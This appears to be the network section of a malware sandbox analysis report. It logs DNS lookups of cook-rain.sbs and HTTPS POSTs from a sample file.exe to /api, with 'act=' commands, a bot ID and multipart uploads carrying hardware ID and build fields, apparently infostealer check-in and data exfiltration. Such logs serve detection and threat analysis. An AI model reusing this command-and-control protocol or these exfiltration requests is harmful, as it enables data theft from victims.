                                                                            Nov 21, 2024 13:10:28.994880915 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994894028 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994909048 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.995049953 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.995068073 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.995085001 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.995229006 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.995248079 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035334110 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035537004 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035584927 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035612106 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035636902 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035645008 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035655022 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:29.035687923 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:29.035702944 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.627166033 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.627266884 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.627368927 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.627620935 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.627639055 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.688389063 CET49762443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.688430071 CET44349762188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:32.688504934 CET49762443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.688836098 CET49762443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:32.688846111 CET44349762188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:33.166292906 CET49762443192.168.2.10188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 13:10:13.209048033 CET | 57797 | 53 | 192.168.2.10 | 1.1.1.1
Nov 21, 2024 13:10:13.437159061 CET | 53 | 57797 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 13:10:13.209048033 CET | 192.168.2.10 | 1.1.1.1 | 0x786e | Standard query (0) | cook-rain.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 13:10:09.022495985 CET | 1.1.1.1 | 192.168.2.10 | 0xe9a4 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 13:10:09.022495985 CET | 1.1.1.1 | 192.168.2.10 | 0xe9a4 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:10:13.437159061 CET | 1.1.1.1 | 192.168.2.10 | 0x786e | No error (0) | cook-rain.sbs | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 13:10:13.437159061 CET | 1.1.1.1 | 192.168.2.10 | 0x786e | No error (0) | cook-rain.sbs | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
• cook-rain.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | 7748 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 12:10:14 UTC | 260 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cook-rain.sbs
2024-11-21 12:10:14 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-11-21 12:10:15 UTC | 984 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 12:10:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mkohddghon70obv1n9esosc5li; expires=Mon, 17-Mar-2025 05:56:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2GquFMWoidtbPtgm9vqDaJUGoVmC%2FviM7XnWcAavQB8bqMbiJMCv6HpGRNbewiLYya5yifaN5ID7tTXFs1Es%2BLro%2F5zwJMC8U%2BuXglwm0QtCciH6STeI715rpa%2BvPgd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e6093548dd6c45c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1759036&cwnd=252&unsent_bytes=0&cid=3f884fbd085f42dc&ts=734&x=0"
2024-11-21 12:10:15 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-21 12:10:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | 7748 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 12:10:17 UTC | 261 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: cook-rain.sbs
2024-11-21 12:10:17 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-21 12:10:17 UTC | 978 | IN | HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 12:10:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ljkocodn8kjifku3hvhv3khp2t; expires=Mon, 17-Mar-2025 05:56:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1ZD6A2qPTfOw1JkMiVZtK4eTJvtjzBgmzyOelk3sNzkNH%2BMGzvbqzktx4Y0NC0jf90Sh7M6twvuvguGPT3GlUIzwXHkXQ895%2Br0WoJX1plmnuKjTPFvA4ymJvwbTW9g"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e6093619c6e7c8d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1851&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=1443400&cwnd=171&unsent_bytes=0&cid=370b5456750fc527&ts=720&x=0"
                                                                            2024-11-21 12:10:17 UTC391INData Raw: 34 34 36 63 0d 0a 74 2b 55 53 4c 57 66 31 76 53 35 39 70 56 33 58 38 35 4e 47 36 43 42 6d 59 38 74 77 74 76 69 42 4e 55 58 72 79 53 37 6c 49 6b 54 4d 78 32 51 50 58 63 47 52 44 41 37 41 66 2b 32 48 34 54 4f 4e 44 45 51 43 72 31 4b 4d 6e 75 42 5a 4e 6f 37 6c 44 4a 4e 50 5a 6f 32 44 63 30 45 55 6b 4a 45 4d 47 4e 31 2f 37 61 6a 6f 5a 49 31 4f 52 46 6e 70 46 64 79 61 34 46 6b 6e 69 71 4a 42 6c 55 34 6e 33 34 6c 31 52 51 4b 57 32 55 38 52 79 44 69 79 6c 76 49 73 68 6b 6b 4c 43 36 5a 53 6d 74 72 6b 54 32 66 52 36 32 4f 41 56 69 58 36 68 47 46 47 52 59 69 52 56 56 2f 41 4d 2f 58 4a 73 53 65 4e 51 67 6f 46 72 78 76 65 6b 4f 6c 52 4a 6f 2b 6a 58 6f 78 45 4c 4e 2b 48 64 6b 51 49 6e 38 31 43 47 38 38 7a 74 4a 7a 79 5a 4d 51 43 41 78 6e 70 53 70 54 4a 30 56 51 32 6d
                                                                            Data Ascii: 446ct+USLWf1vS59pV3X85NG6CBmY8twtviBNUXryS7lIkTMx2QPXcGRDA7Af+2H4TONDEQCr1KMnuBZNo7lDJNPZo2Dc0EUkJEMGN1/7ajoZI1ORFnpFdya4FkniqJBlU4n34l1RQKW2U8RyDiylvIshkkLC6ZSmtrkT2fR62OAViX6hGFGRYiRVV/AM/XJsSeNQgoFrxvekOlRJo+jXoxELN+HdkQIn81CG88ztJzyZMQCAxnpSpTJ0VQ2m
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 59 63 77 41 55 57 51 78 77 78 48 68 78 79 77 67 66 59 6f 6e 41 41 2b 51 62 5a 63 7a 64 72 6b 57 32 66 52 36 30 53 43 51 79 58 65 69 48 4e 48 44 6f 58 66 58 68 6e 4b 4f 71 65 58 39 43 71 41 51 52 59 4c 70 78 54 58 6b 2b 68 65 49 6f 36 76 44 4d 6b 41 49 63 33 48 4b 41 38 6b 6d 74 52 41 46 64 41 2f 39 59 36 2f 50 63 70 46 43 45 48 78 55 74 43 62 35 31 59 6a 68 36 56 49 69 30 59 6f 32 49 68 32 52 51 57 51 31 55 51 58 78 6a 4b 2b 6e 76 45 68 68 30 59 43 44 61 67 58 6c 4e 53 6a 55 44 2f 4a 38 77 79 70 52 79 58 48 78 55 56 4d 43 35 6e 59 57 6c 2f 59 63 61 7a 52 39 69 6a 4b 47 6b 51 50 72 42 33 47 6d 2f 46 53 4b 5a 75 6e 53 59 46 4e 4a 64 75 48 64 55 67 49 6d 64 6c 4c 48 4d 38 37 74 4a 2f 39 4c 6f 6c 47 42 30 48 6e 55 74 4f 43 6f 77 39 6e 75 4b 68 49 67 46 49 6c
                                                                            Data Ascii: YcwAUWQxwxHhxywgfYonAA+QbZczdrkW2fR60SCQyXeiHNHDoXfXhnKOqeX9CqAQRYLpxTXk+heIo6vDMkAIc3HKA8kmtRAFdA/9Y6/PcpFCEHxUtCb51Yjh6VIi0Yo2Ih2RQWQ1UQXxjK+nvEhh0YCDagXlNSjUD/J8wypRyXHxUVMC5nYWl/YcazR9ijKGkQPrB3Gm/FSKZunSYFNJduHdUgImdlLHM87tJ/9LolGB0HnUtOCow9nuKhIgFIl
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 67 42 6d 39 5a 42 47 63 63 34 73 5a 54 6a 49 59 4e 4f 43 45 48 6e 55 74 4f 43 6f 77 39 6e 70 71 78 61 68 47 38 6c 78 49 34 77 55 45 75 4f 6e 30 73 54 68 32 66 31 6c 76 51 73 67 55 51 4d 41 62 73 58 32 70 48 69 58 53 47 49 70 6b 43 42 51 43 66 56 67 58 78 50 41 70 44 4e 58 68 72 42 4c 62 2f 52 76 32 53 4e 57 6b 52 5a 36 53 54 45 6a 66 4a 42 5a 62 79 6f 51 6f 6c 48 4d 4a 57 59 50 6c 5a 46 6b 4e 4d 4d 52 34 63 30 74 5a 33 32 4c 49 78 47 44 41 36 6d 47 38 61 62 37 31 6b 31 6a 71 74 46 69 55 38 71 33 49 70 33 51 67 36 64 30 6b 67 59 78 6e 2f 37 30 66 59 38 79 68 70 45 4e 37 6b 66 32 4c 54 6f 57 79 37 4a 74 41 4b 65 41 43 48 5a 78 79 67 50 41 5a 76 58 52 68 44 4f 4e 62 2b 65 2b 43 53 43 53 77 30 43 71 52 37 53 6d 2b 39 62 4b 6f 79 6f 53 59 70 46 4a 74 6d 41 64
                                                                            Data Ascii: gBm9ZBGcc4sZTjIYNOCEHnUtOCow9npqxahG8lxI4wUEuOn0sTh2f1lvQsgUQMAbsX2pHiXSGIpkCBQCfVgXxPApDNXhrBLb/Rv2SNWkRZ6STEjfJBZbyoQolHMJWYPlZFkNMMR4c0tZ32LIxGDA6mG8ab71k1jqtFiU8q3Ip3Qg6d0kgYxn/70fY8yhpEN7kf2LToWy7JtAKeACHZxygPAZvXRhDONb+e+CSCSw0CqR7Sm+9bKoyoSYpFJtmAd
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 66 46 46 2f 4c 50 4c 6d 5a 2f 69 4b 44 54 67 34 49 6f 68 37 66 6e 75 39 65 49 6f 2b 71 53 59 4a 42 49 74 6d 4e 64 6b 77 47 6d 4e 42 44 46 34 64 78 39 5a 62 70 5a 4e 49 43 49 52 61 69 48 4e 4c 61 2f 42 6b 2b 79 61 78 41 78 78 68 6d 32 59 35 32 53 51 43 62 33 6b 6f 58 77 6a 65 78 6b 50 63 69 69 55 30 41 42 4b 67 64 30 4a 62 74 58 53 61 49 70 30 65 49 53 79 4f 56 79 54 42 49 48 64 65 48 44 43 37 45 4b 61 4b 42 2f 57 53 56 44 42 31 42 72 68 36 55 77 71 4e 57 4e 59 4f 68 51 6f 4a 50 49 39 61 49 64 30 49 44 6d 39 56 46 46 38 45 77 76 49 50 79 4b 49 52 46 43 67 32 6e 48 39 36 5a 37 68 64 70 79 61 78 55 78 78 68 6d 2b 59 42 39 59 51 36 62 32 41 77 41 69 53 62 31 6c 76 31 6b 30 67 49 49 43 36 55 62 31 4a 50 6d 58 79 79 41 72 6b 32 4d 52 53 58 54 69 6e 39 47 46 35
                                                                            Data Ascii: fFF/LPLmZ/iKDTg4Ioh7fnu9eIo+qSYJBItmNdkwGmNBDF4dx9ZbpZNICIRaiHNLa/Bk+yaxAxxhm2Y52SQCb3koXwjexkPciiU0ABKgd0JbtXSaIp0eISyOVyTBIHdeHDC7EKaKB/WSVDB1Brh6UwqNWNYOhQoJPI9aId0IDm9VFF8EwvIPyKIRFCg2nH96Z7hdpyaxUxxhm+YB9YQ6b2AwAiSb1lv1k0gIIC6Ub1JPmXyyArk2MRSXTin9GF5
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 68 7a 6d 36 6d 50 49 72 69 30 73 49 44 4b 77 62 30 5a 76 6c 55 79 32 44 71 30 71 42 51 53 50 66 68 48 46 46 44 4a 44 58 53 78 7a 56 66 2f 76 52 39 6a 7a 4b 47 6b 51 6f 72 67 44 61 69 71 4e 49 61 5a 44 72 53 34 73 41 66 70 57 44 65 6b 41 42 6b 4e 4e 4b 47 73 45 79 74 4a 37 77 4a 49 56 47 44 77 69 76 45 39 6d 66 37 6c 4d 31 67 36 42 44 69 30 6b 71 32 4d 63 2b 44 77 4b 50 6e 78 52 66 39 6a 4b 37 6e 2f 59 79 79 6c 31 4b 47 4f 6b 56 32 4e 71 37 46 79 61 46 70 45 2b 49 51 79 58 55 6a 57 4a 64 43 5a 37 58 53 52 50 4d 4d 62 4f 44 39 79 75 44 51 51 63 49 72 68 72 59 6b 4f 42 51 5a 38 66 72 53 35 38 41 66 70 57 6b 5a 31 38 49 31 38 41 43 42 6f 63 34 75 64 47 70 5a 49 4a 50 44 41 75 74 46 64 6d 64 35 56 34 31 67 4b 35 43 68 30 51 74 32 6f 46 30 54 41 57 46 32 55 67
                                                                            Data Ascii: hzm6mPIri0sIDKwb0ZvlUy2Dq0qBQSPfhHFFDJDXSxzVf/vR9jzKGkQorgDaiqNIaZDrS4sAfpWDekABkNNKGsEytJ7wJIVGDwivE9mf7lM1g6BDi0kq2Mc+DwKPnxRf9jK7n/Yyyl1KGOkV2Nq7FyaFpE+IQyXUjWJdCZ7XSRPMMbOD9yuDQQcIrhrYkOBQZ8frS58AfpWkZ18I18ACBoc4udGpZIJPDAutFdmd5V41gK5Ch0Qt2oF0TAWF2Ug
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 39 48 32 50 4d 6f 61 52 43 43 79 45 64 69 58 6f 30 68 70 6b 4f 74 4c 69 77 42 2b 6c 59 74 2b 53 67 57 64 32 55 67 61 77 54 57 77 6b 66 6f 6e 68 55 59 43 42 61 59 53 33 35 50 69 55 53 4b 44 6f 45 71 4b 51 79 44 54 78 7a 34 50 41 6f 2b 66 46 46 2f 6e 4a 4c 69 64 39 6d 53 56 44 42 31 42 72 68 36 55 77 71 4e 63 4b 34 32 73 54 49 70 44 4c 74 43 44 65 6b 6f 46 6e 38 31 45 48 38 41 74 70 35 48 34 49 59 5a 42 42 41 57 76 47 39 4b 5a 35 78 64 70 79 61 78 55 78 78 68 6d 2b 49 74 33 5a 67 4b 4d 6e 31 4e 52 33 6e 2b 79 6e 62 46 38 79 6b 4d 50 43 36 59 66 31 35 7a 67 58 43 4b 44 71 6b 75 50 54 54 54 57 69 48 39 4c 42 5a 6a 5a 53 68 37 49 4f 62 4b 59 38 43 79 4e 41 6b 70 42 72 67 71 55 77 71 4e 35 49 49 71 76 44 4a 67 4f 50 35 57 41 66 41 39 64 31 39 39 47 46 63 30 78
                                                                            Data Ascii: 9H2PMoaRCCyEdiXo0hpkOtLiwB+lYt+SgWd2UgawTWwkfonhUYCBaYS35PiUSKDoEqKQyDTxz4PAo+fFF/nJLid9mSVDB1Brh6UwqNcK42sTIpDLtCDekoFn81EH8Atp5H4IYZBBAWvG9KZ5xdpyaxUxxhm+It3ZgKMn1NR3n+ynbF8ykMPC6Yf15zgXCKDqkuPTTTWiH9LBZjZSh7IObKY8CyNAkpBrgqUwqN5IIqvDJgOP5WAfA9d199GFc0x
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 72 4b 57 6b 52 5a 36 53 66 58 6c 4f 31 51 4d 5a 6a 6d 61 35 46 4b 49 63 57 41 5a 30 42 46 32 5a 39 4b 58 35 39 73 2b 39 48 31 4e 63 6f 61 56 46 50 79 52 34 66 4e 73 77 55 34 78 37 49 4d 6b 51 42 2b 68 38 6b 77 58 55 58 50 6e 77 73 63 31 53 32 7a 6b 75 63 6e 7a 58 77 36 4a 72 4d 66 30 6f 33 79 61 52 6d 4f 73 55 47 42 56 7a 65 5a 6b 6e 4e 42 43 35 44 4a 44 46 47 48 4d 50 58 4a 79 47 54 43 41 6a 74 50 36 51 71 55 77 71 4e 69 4a 49 65 6c 53 35 46 52 61 2f 4b 64 66 55 6b 53 68 70 38 43 58 38 46 2f 37 63 47 2f 5a 49 35 54 52 46 6e 35 51 49 2f 50 73 41 42 33 32 37 51 43 6e 67 41 77 6c 64 38 69 41 55 57 46 6e 78 52 66 67 44 79 6e 67 2f 63 6e 6e 45 46 44 50 35 63 38 30 35 7a 6d 55 44 66 4c 68 55 65 54 52 32 61 62 78 33 38 50 58 61 36 66 42 46 2f 34 63 66 57 4a 73
                                                                            Data Ascii: rKWkRZ6SfXlO1QMZjma5FKIcWAZ0BF2Z9KX59s+9H1NcoaVFPyR4fNswU4x7IMkQB+h8kwXUXPnwsc1S2zkucnzXw6JrMf0o3yaRmOsUGBVzeZknNBC5DJDFGHMPXJyGTCAjtP6QqUwqNiJIelS5FRa/KdfUkShp8CX8F/7cG/ZI5TRFn5QI/PsAB327QCngAwld8iAUWFnxRfgDyng/cnnEFDP5c805zmUDfLhUeTR2abx38PXa6fBF/4cfWJs
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 56 51 66 46 43 68 73 47 32 42 48 44 5a 2b 56 50 4a 57 57 62 44 78 79 67 64 53 39 66 4e 44 45 65 48 65 4c 61 44 34 79 4b 4a 56 41 64 47 6c 79 7a 7a 6c 4f 52 57 4d 5a 6d 38 51 38 68 75 45 50 53 35 54 6c 6f 47 6d 64 46 4c 43 64 5a 2f 2b 39 48 2b 5a 4e 4a 37 52 45 6e 70 4c 5a 72 61 2b 78 64 2f 79 5a 35 50 69 55 34 68 77 35 59 39 61 41 75 51 33 6c 6f 50 30 44 44 36 76 38 63 46 79 67 78 45 42 2b 6c 4b 68 74 53 6a 55 7a 62 4a 38 78 7a 56 47 33 4f 47 30 43 41 64 47 74 6e 47 44 41 6d 48 5a 2b 66 66 73 54 62 4b 47 6b 52 47 71 67 44 47 6e 4f 42 42 4a 4d 36 56 63 71 42 4f 49 64 53 52 59 45 49 4a 74 74 78 64 46 66 6b 42 6f 4a 4c 2f 4b 6f 31 55 46 55 48 6e 55 74 76 61 75 32 35 6e 77 65 74 7a 79 51 41 2b 6c 64 38 77 65 67 61 5a 30 55 73 4a 31 6e 4b 53 6e 2f 59 6c 6e 46
                                                                            Data Ascii: VQfFChsG2BHDZ+VPJWWbDxygdS9fNDEeHeLaD4yKJVAdGlyzzlORWMZm8Q8huEPS5TloGmdFLCdZ/+9H+ZNJ7REnpLZra+xd/yZ5PiU4hw5Y9aAuQ3loP0DD6v8cFygxEB+lKhtSjUzbJ8xzVG3OG0CAdGtnGDAmHZ+ffsTbKGkRGqgDGnOBBJM6VcqBOIdSRYEIJttxdFfkBoJL/Ko1UFUHnUtvau25nwetzyQA+ld8wegaZ0UsJ1nKSn/YlnF
                                                                            2024-11-21 12:10:17 UTC1369INData Raw: 45 5a 54 55 6f 30 39 6e 30 65 74 68 6c 55 63 32 31 73 56 63 53 41 69 62 6e 31 4e 52 33 6e 2b 6a 30 61 6c 33 78 41 49 57 51 66 46 53 6b 35 6e 78 52 53 47 4b 76 55 2f 41 66 68 6a 34 6c 58 64 66 42 74 58 75 51 52 76 52 4b 72 61 42 39 68 71 30 62 78 59 47 75 52 47 57 76 39 6b 56 46 70 2b 6f 54 49 6c 48 5a 70 76 48 61 41 39 64 31 2f 4a 65 47 4e 63 38 39 37 54 4c 5a 72 74 55 42 77 47 6e 46 5a 53 46 72 55 35 6e 6e 2b 73 55 31 41 35 6d 78 38 63 6f 44 30 4b 5a 30 6b 30 63 79 54 79 6e 67 2f 63 6e 6e 45 46 44 50 35 63 39 33 35 76 7a 57 6a 61 45 72 31 71 35 66 67 48 54 67 6e 64 78 4f 36 44 4f 53 77 2b 46 47 62 61 48 38 6d 54 45 41 68 78 42 38 56 4c 7a 6e 4f 5a 51 5a 38 66 72 53 4d 63 59 5a 76 71 4d 63 56 38 49 68 74 4a 49 43 59 55 59 73 35 54 32 5a 4d 51 43 43 45 48
                                                                            Data Ascii: EZTUo09n0ethlUc21sVcSAibn1NR3n+j0al3xAIWQfFSk5nxRSGKvU/Afhj4lXdfBtXuQRvRKraB9hq0bxYGuRGWv9kVFp+oTIlHZpvHaA9d1/JeGNc897TLZrtUBwGnFZSFrU5nn+sU1A5mx8coD0KZ0k0cyTyng/cnnEFDP5c935vzWjaEr1q5fgHTgndxO6DOSw+FGbaH8mTEAhxB8VLznOZQZ8frSMcYZvqMcV8IhtJICYUYs5T2ZMQCCEH


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | 7748 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 12:10:19 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AVORIOJXV765HT2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12835
Host: cook-rain.sbs
                                                                            2024-11-21 12:10:19 UTC12835OUTData Raw: 2d 2d 41 56 4f 52 49 4f 4a 58 56 37 36 35 48 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 41 56 4f 52 49 4f 4a 58 56 37 36 35 48 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 56 4f 52 49 4f 4a 58 56 37 36 35 48 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                            Data Ascii: --AVORIOJXV765HT2Content-Disposition: form-data; name="hwid"8C76D044CA0F3E1063CFCF7E6C45F838--AVORIOJXV765HT2Content-Disposition: form-data; name="pid"2--AVORIOJXV765HT2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                            2024-11-21 12:10:20 UTC984INHTTP/1.1 200 OK
                                                                            Date: Thu, 21 Nov 2024 12:10:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=s5hlgeulg87gfaqmuuvc1os9hk; expires=Mon, 17-Mar-2025 05:56:58 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8F6gSgIjjlagONGL3N7ouFxc%2FGEwo9uwgDOX9glXHU7OEFx8dX6Jl8fDYBjjDXOLBOpINqbJZ0GZ%2FsNRda7GtISJZPV9Wk%2B1XYCFHWGdGiftQgBa2l2wiJzGovbr8H65"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8e60936fbb1743c9-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2828&recv_bytes=13769&delivery_rate=1752701&cwnd=230&unsent_bytes=0&cid=20154bc03e17ad5b&ts=935&x=0"
                                                                            2024-11-21 12:10:20 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                            Data Ascii: eok 8.46.123.75
                                                                            2024-11-21 12:10:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 3 | Source IP: 192.168.2.10 | Source Port: 49724 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7748 | Process: C:\Users\user\Desktop\file.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-11-21 12:10:21 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=92XN0U0NYXL5IDP46
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 15074
                                                                            Host: cook-rain.sbs
                                                                            2024-11-21 12:10:21 UTC15074OUTData Raw: 2d 2d 39 32 58 4e 30 55 30 4e 59 58 4c 35 49 44 50 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 37 36 44 30 34 34 43 41 30 46 33 45 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 39 32 58 4e 30 55 30 4e 59 58 4c 35 49 44 50 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 32 58 4e 30 55 30 4e 59 58 4c 35 49 44 50 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
